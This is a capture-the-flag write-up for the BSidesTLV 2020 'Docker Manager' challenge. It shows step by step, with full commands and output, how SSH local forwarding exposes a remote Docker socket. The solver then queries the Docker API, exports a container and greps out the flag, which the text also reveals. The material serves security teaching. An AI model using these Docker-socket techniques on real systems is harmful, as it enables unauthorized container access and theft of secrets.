Docker Manager
- Category: Misc
- 350 Points
- Solved by the JCTF Team
Description
Solution
We connect to SSH server using sshpass -p 'd0ck3rm4n4g3r' ssh [email protected] -p 8000
and immediate get the following screen:
In this screen we can try to enter a password, however we don't know what the correct password is.
We can't seem to kill this application or execute anything interesting within it.
At some point, the following hint was published by the organizers:
SSH + Docker = :broken_heart:
Indeed! using SSH Tunneling we can expose the Docker Deamon Socket which allows using the Docker API.
We can create the tunnel by running the following command:
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# sshpass -p 'd0ck3rm4n4g3r' ssh -N -L localhost:9999:/var/run/docker.sock [email protected] -p 8000
This means that when we access our localhost at port 9999, the request will be tunneled to the remote host at port /var/run/docker.sock
.
Let's try this:
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# curl -s http://localhost:9999/version | python -m json.tool
{
"ApiVersion": "1.40",
"Arch": "amd64",
"BuildTime": "2020-03-11T01:29:16.000000000+00:00",
"Components": [
{
"Details": {
"ApiVersion": "1.40",
"Arch": "amd64",
"BuildTime": "2020-03-11T01:29:16.000000000+00:00",
"Experimental": "false",
"GitCommit": "afacb8b",
"GoVersion": "go1.12.17",
"KernelVersion": "4.19.104-microsoft-standard",
"MinAPIVersion": "1.12",
"Os": "linux"
},
"Name": "Engine",
"Version": "19.03.8"
},
{
"Details": {
"GitCommit": "7ad184331fa3e55e52b890ea95e65ba581ae3429"
},
"Name": "containerd",
"Version": "v1.2.13"
},
{
"Details": {
"GitCommit": "dc9208a3303feef5b3839f4323d9beb36df0a9dd"
},
"Name": "runc",
"Version": "1.0.0-rc10"
},
{
"Details": {
"GitCommit": "fec3683"
},
"Name": "docker-init",
"Version": "0.18.0"
}
],
"GitCommit": "afacb8b",
"GoVersion": "go1.12.17",
"KernelVersion": "4.19.104-microsoft-standard",
"MinAPIVersion": "1.12",
"Os": "linux",
"Platform": {
"Name": "Docker Engine - Community"
},
"Version": "19.03.8"
}
We have contact! Now, let's enumerate the containers:
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# curl -s http://localhost:9999/containers/json | python -m json.tool
[
{
"Command": "docker-entrypoint.sh /usr/sbin/sshd -D",
"Created": 1593249326,
"HostConfig": {
"NetworkMode": "docker-manager_default"
},
"Id": "ca3b76fc5a79dbfaffa9c11456d5ccecd43f03f37e8cfdb7becc27cc59ed3f1d",
"Image": "docker-manager_challenge",
"ImageID": "sha256:f2def1180f982e1c9955725a219ce8532d305ae6e01e66c9643f7dbe0c3ad8f7",
"Labels": {
"com.docker.compose.config-hash": "0345033b5a07fe9cd165abbf678cd54dbc8a05ae93d1f715eafab117973e436c",
"com.docker.compose.container-number": "1",
"com.docker.compose.oneoff": "False",
"com.docker.compose.project": "docker-manager",
"com.docker.compose.project.config_files": "docker-manager/docker-compose.yml",
"com.docker.compose.project.working_dir": "/mnt/e/Projects/BSidesTLVCTF/ctf20/dockerfiles/docker-manager/api/docker-manager",
"com.docker.compose.service": "challenge",
"com.docker.compose.version": "1.25.5",
"desktop.docker.io/wsl-distro": "Ubuntu-20.04"
},
"Mounts": [
{
"Destination": "/var/run/docker.sock",
"Mode": "rw",
"Propagation": "rprivate",
"RW": true,
"Source": "/run/desktop/mnt/host/wsl/docker-desktop-bind-mounts/Ubuntu-20.04/71329c4cc6e32171553fa81d044eb31d1a3aac52ba9376c4a99f4505c494cf5b",
"Type": "bind"
}
],
"Names": [
"/docker-manager_challenge_1"
],
"NetworkSettings": {
"Networks": {
"docker-manager_default": {
"Aliases": null,
"DriverOpts": null,
"EndpointID": "d51f6464dfb631039c8a278f671cf68ae2615048f4f279d9ee1a761397871179",
"Gateway": "172.29.0.1",
"GlobalIPv6Address": "",
"GlobalIPv6PrefixLen": 0,
"IPAMConfig": null,
"IPAddress": "172.29.0.2",
"IPPrefixLen": 16,
"IPv6Gateway": "",
"Links": null,
"MacAddress": "02:42:ac:1d:00:02",
"NetworkID": "0f2a5ae4391f59b48cb8a5dd2344b2b304bea6a3497c8ab0fd0cbc3029616c4e"
}
}
},
"Ports": [
{
"IP": "0.0.0.0",
"PrivatePort": 22,
"PublicPort": 2222,
"Type": "tcp"
}
],
"State": "running",
"Status": "Up Less than a second"
}
]
Solution 1:
we can download the container and grep the flag :-)
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# curl 127.0.0.1:8080/containers/ca3b76fc5a79dbfaffa9c11456d5ccecd43f03f37e8cfdb7becc27cc59ed3f1d/export > image.tar
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# mkdir image
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# tar -xf image.tar -C image
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# grep -Ri BSidesTLV image
image/app/flag:BSidesTLV2020{SSH_F0RWARD1NG_F0R_FUN_4ND_PR0F1T}
Solution 2:
We have one container, let's view its details and search for the flag:
[email protected]:/media/sf_CTFs/bsidestlv/Docker_Manager/docker# curl -s http://localhost:9999/containers/ca3b76fc5a79dbfaffa9c11456d5ccecd43f03f37e8cfdb7becc27cc59ed3f1d/json | python3 -m json.tool | grep -i bsides
"FLAG=BSidesTLV2020{SSH_F0RWARD1NG_F0R_FUN_4ND_PR0F1T}"
"com.docker.compose.project.working_dir": "/mnt/e/Projects/BSidesTLVCTF/ctf20/dockerfiles/docker-manager/api/docker-manager",
The flag: BSidesTLV2020{SSH_F0RWARD1NG_F0R_FUN_4ND_PR0F1T}